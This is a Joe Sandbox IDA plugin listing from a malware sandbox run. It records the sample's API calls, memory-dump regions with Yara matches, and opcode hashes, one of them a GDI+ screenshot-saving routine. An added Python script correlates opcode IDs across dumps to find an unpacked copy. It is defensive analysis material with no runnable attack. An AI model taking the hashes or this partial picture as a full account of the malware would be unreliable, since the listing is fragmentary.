Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
• int.LIBCPMT ref: 004054FA
  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
• std::locale::_Getfacet.LIBCPMT ref: 00405503
• std::_Facet_Register.LIBCPMT ref: 00405534
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
• __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
• int.LIBCPMT ref: 00405596
  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
• std::locale::_Getfacet.LIBCPMT ref: 0040559F
• std::_Facet_Register.LIBCPMT ref: 004055D0
• std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
• __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                    • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024CC401
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 024CC418
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 024CC421
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 024CC452
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024CC468
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024CC486
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                    • Instruction ID: 1ee5f96832ed2fae7e2ae468e4368d9f71a519fe0dd3b6c4ce8637cae64c223a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11CE79900228ABCF55EBA9D884AEE7772AF40714F34411FE815AB2A0DF748A01CF94
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024C4E8C
                                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 024C4EA3
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                      • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 024C4EAC
                                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 024C4EDD
                                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024C4EF3
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024C4F11
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction ID: d9c20067d2a9bb7bfa1c5afec29493e2bad5dbcd634e420e7a3b0ee830e3f39b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9911AC799002289BCF55EBA9E910AAE77B2AF44324F34011FE811A72A0DF749A01CF95
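The records above show the same Opcode ID (8360cf2a…) once in the PE-backed image at base 00400000 and once in the non-PE-backed, Yara-matched region at base 024C0000, with different Instruction IDs. That pattern is what an analyst looks for when deciding whether a heap or private region holds a relocated copy of the sample's own code. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses a constructed excerpt of three report rows from this page (trimmed to the fields it reads) and lists Opcode IDs that occur in both a PE-backed and a non-PE-backed dump. The record layout it assumes (a record starts at an "APIs" header; the Source File line carries Offset and based on PE) is taken from the rows on this page; field names such as `pe_backed` and `addr` are this example's own.

```python
"""Correlate Joe Sandbox function records across memory dumps by Opcode ID.

Added example, not part of the Joe Sandbox report or its IDA plugin.
RECORDS is a constructed excerpt: three rows from the report trimmed to the
fields the parser reads. Field names used here are this example's own.
"""
import re
from collections import defaultdict

RECORDS = """\
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
• __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
• Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 024CC401
• __CxxThrowException@8.LIBVCRUNTIME ref: 024CC486
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
• Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
• Instruction ID: 1ee5f96832ed2fae7e2ae468e4368d9f71a519fe0dd3b6c4ce8637cae64c223a
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 024C4E8C
• __CxxThrowException@8.LIBVCRUNTIME ref: 024C4F11
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
• Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
• Instruction ID: d9c20067d2a9bb7bfa1c5afec29493e2bad5dbcd634e420e7a3b0ee830e3f39b
"""

SOURCE_RE = re.compile(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")


def parse_records(text):
    """One dict per function; a record starts at an 'APIs' header line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "subcalls": [], "yara": False}
            records.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":
            cur["yara"] = True          # the dump region this function sits in has Yara hits
            continue
        if line.startswith("\u2022"):   # drop the bullet
            line = line[1:].strip()
        if line.startswith("Part of subcall function"):
            cur["subcalls"].append(line)
        elif line.startswith("Source File:"):
            m = SOURCE_RE.search(line)
            cur["base"] = int(m.group(1), 16)
            cur["pe_backed"] = m.group(2) == "true"
        elif line.startswith("Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction ID:"):
            cur["instruction_id"] = line.split(":", 1)[1].strip()
        elif " ref: " in line:          # "int.LIBCPMT ref: 00404C3C" or "...), ref: 0042FF04"
            name, _, addr = line.rpartition(" ref: ")
            cur["apis"].append((name.rstrip(","), int(addr, 16)))
    for r in records:
        # lowest call-site address: a hint for where the function lives, not its entry point
        r["addr"] = min((a for _, a in r["apis"]), default=None)
    return records


def shared_opcode_ids(records):
    """Opcode IDs present in both a PE-backed image and a non-PE-backed region."""
    by_id = defaultdict(list)
    for r in records:
        by_id[r["opcode_id"]].append(r)
    return {oid: rs for oid, rs in by_id.items()
            if {r["pe_backed"] for r in rs} == {True, False}}


def report(records):
    """Human-readable summary of the cross-dump matches."""
    out = []
    for oid, rs in shared_opcode_ids(records).items():
        out.append(f"opcode {oid[:16]}... seen in {len(rs)} dumps:")
        for r in rs:
            kind = "PE image" if r["pe_backed"] else "non-PE region"
            yara = " [Yara]" if r["yara"] else ""
            out.append(f"  base {r['base']:08X} ({kind}){yara} near {r['addr']:08X}, "
                       f"instruction id {r['instruction_id'][:16]}...")
    return "\n".join(out)


if __name__ == "__main__":
    print(report(parse_records(RECORDS)))
```

A matching Opcode ID at two bases says the same instruction stream was present in both dumps; the differing Instruction IDs are consistent with address-bearing operands changing with the base, which is what a relocated copy looks like. Treat the result as a lead, and confirm against the dump itself (section layout, entry point, strings) before calling the non-PE-backed region an unpacked copy of the sample.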
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                    • String ID: fJ@
                                                                                                                                                                                                                                                                    • API String ID: 1836011271-3478227103
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
• FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
• __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 3657713681-923244539
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: H_prolog3_catchmake_shared
• String ID: MOC$RCC$v)D
• API String ID: 3472968176-3108830043
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
APIs
  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
• _free.LIBCMT ref: 00430B4F
• _free.LIBCMT ref: 00430B66
• _free.LIBCMT ref: 00430B85
• _free.LIBCMT ref: 00430BA0
• _free.LIBCMT ref: 00430BB7
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: _free$AllocateHeap
• API String ID: 3033488037-0
                                                                                                                                                                                                                                                                    • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                    • Instruction ID: a1d7f9c6ac35f1cf8b87ceeeb3d2430f2b419e7d626d5d2ff3ddd80ffd887a0f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9551A072A00305AFDBA19F2AD841B6BB7F5EFC8724B14156EEA09D7255E731E901CB80
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction ID: bc61ed7c781782cb2f9cb14b803ddee5f6add24aa248f1772753f32055a27a18
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D641DE36A00204DFDB60DF79C980A9EB7E6EF89714F1545AADA19EB381D731E901CB80
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 313313983-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                    • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                                                      • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                    • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                    • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 024DB152
                                                                                                                                                                                                                                                                      • Part of subcall function 024D1188: _SpinWait.LIBCONCRT ref: 024D11A0
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024DB166
                                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024DB198
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 024DB21B
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 024DB22A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                    • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                    • Instruction ID: fe81078b9b9c93e447e2a370094fa9cdf0579522588042eb0364f93c55b3571f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95314332A00656EFCB16EFA5C9A06EEBBB2FF05348F06406FC8156B641CB716904CF94
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00402072
• GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
• GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
• GdiplusShutdown.GDIPLUS(?), ref: 004020E3
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
• String ID:
• API String ID: 2357751836-0
• Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
• Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
• Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
• Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
APIs
• std::_Locinfo::_Locinfo.LIBCPMT ref: 024C50A3
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C50B7
• std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
• __Getcoll.LIBCPMT ref: 024C512B
• std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
